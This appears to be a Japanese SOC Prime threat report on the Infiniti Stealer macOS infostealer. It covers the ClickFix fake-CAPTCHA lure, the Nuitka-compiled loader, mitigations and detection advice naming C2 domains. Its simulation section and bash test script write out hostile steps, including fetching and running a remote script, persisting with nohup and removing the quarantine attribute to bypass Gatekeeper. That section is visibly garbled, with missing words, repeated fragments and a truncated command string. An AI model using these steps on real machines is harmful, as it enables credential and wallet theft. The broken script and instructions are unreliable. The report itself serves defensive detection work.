SOC Prime Bias: 中程度

30 Mar 2026 12:52 UTC

Infiniti Stealer: ClickFixとPython/Nuitkaを使用する新しいmacOSインフォスティーラー

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon フォローする
Infiniti Stealer: ClickFixとPython/Nuitkaを使用する新しいmacOSインフォスティーラー
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

新たに識別されたmacOS用情報窃取マルウェア「Infiniti Stealer」が、ClickFixというソーシャルエンジニアリングの手法を用いてユーザーを感染させていることが判明しました。このマルウェアはNuitkaを使用して構築されており、PythonコードをネイティブのMach-Oバイナリに変換することで、静的検査を困難にしています。実行されると、資格情報、キーチェーンデータ、暗号通貨ウォレットファイル、その他の機密情報を盗み、収集されたデータをHTTP POSTリクエストを介して外部に送信します。このキャンペーンはまた、偽のCAPTCHAページを悪意のあるドメインにホストし、被害者を騙して有害なBashコマンドを実行させる手法にも依存しています。

調査

研究者たちは、ルーチンの脅威ハンティング中にこのペイロードを発見し、最初は仮の名前「NukeChain」で追跡しましたが、脅威アクターのパネルが最終的に「Infiniti Stealer」としてのブランドを明らかにしました。分析によって3段階の流れが明らかになりました:偽のCAPTCHAを通じたBashドロッパー、Nuitkaでコンパイルされたローダー、そしてPythonベースの情報窃取モジュールです。ドロッパーはバイナリを配置します /tmp、隔離属性を削除し、環境変数を介してC2の詳細を渡しながらそれを起動します。最終段階では、ブラウザ、キーチェーン、ウォレット、開発者関連ファイルからデータを収集し、それを攻撃者が制御するサーバーに送信します。

緩和策

ユーザーは、不明なウェブサイトからコマンドをコピーして実行してはなりません、特にCAPTCHAチャレンジの確認を装ったページではそうです。防御者は、疑わしいファイルを検査して削除し、 /tmp or ~/Library/LaunchAgentsで信頼されるアンチマルウェアスキャンを実行し、露出の可能性があるアカウントのパスワードをクリーンなシステムから変更してください。収集された可能性があるAPIトークンやSSHキーも取り消すべきです。

対応

検出チームは、記述された命名パターンに一致するファイルの作成を監視し、ドロッパースクリプトとNuitkaでコンパイルされたバイナリを監視する必要があります。悪意のあるBashコマンドの実行時や指定されたC2ドメインへのHTTP POSTトラフィックの送信時にアラートをトリガーする必要があります。ネットワークアクセスを /tmp で阻止する必要があります。ホストベースの法医学的レビューにより、盗まれた認証情報を特定し、必須の認証情報リセットをサポートする必要があります。 update-check.com and infiniti-stealer.com ブロックする必要があります。その後、ホストベースの法医学的レビューによって盗まれた認証情報を特定し、必須の認証情報リセットを支援します。

攻撃フロー

シミュレーション実行

前提条件: テレメトリー&ベースラインの「プレフライトチェック」が合格している必要があります。

攻撃シナリオ & コマンド

攻撃者はフィッシングリンクを配信し、それをmacOSワークステーションで開くと、次のワンライナーがターミナルで実行されます。コマンド:

  1. ベース64でエンコードされたURL(ペイロードホスト)を の使用を通じてダウンロードします curl -sSfL.
  2. ベース64文字列をデコードし、実際のHTTPS URLを表示します。 ダウンロードされたスクリプトを
  3. の使用を通じて実行します と共に と共に.
  4. で実行 ターミナルが閉じた後もそれを生かすための nohup を実行
  5. 隔離属性を削除します ( )を使用してGatekeeperをバイパスします。)を使用してGatekeeperをバイパスします。これらの手順により、Sigmaルールが観察している正確なコマンドラインフラグメントが生成され、期待されるアラートが生成されます。

回帰テストスクリプト

#!/usr/bin/env bash # ———————————————————— # Infiniti Stealer感染シミュレーション (macOS) # ———————————————————— # 1. 悪意のあるワンライナーをビルド (ルールが期待する通りに) MALICIOUS_CMD=”bash /dev/null 2>&1 &” MALICIOUS_CMD+=” && xattr -dr com.apple.quarantine /Applications/Utilities/Terminal.app” # 3. コマンドを実行 eval “$MALICIOUS_CMD” # 4. SIEMの取り込みを許可するために数秒待機 sleep 5 # 5. 手動検証のためのマーカーを出力 echo “>>> シミュレーション実行 – SIEMでアラートを監視 <<<"

クリーンアップコマンド

#!/usr/bin/env bash # ———————————————————— # Infiniti Stealerシミュレーション後のクリーンアップ # ———————————————————— # シミュレーションによって開始されたバックグラウンドnohupプロセスを終了 pkill -f “bash /dev/null || true echo “クリーンアップ完了。”

レポート終了

攻撃フロー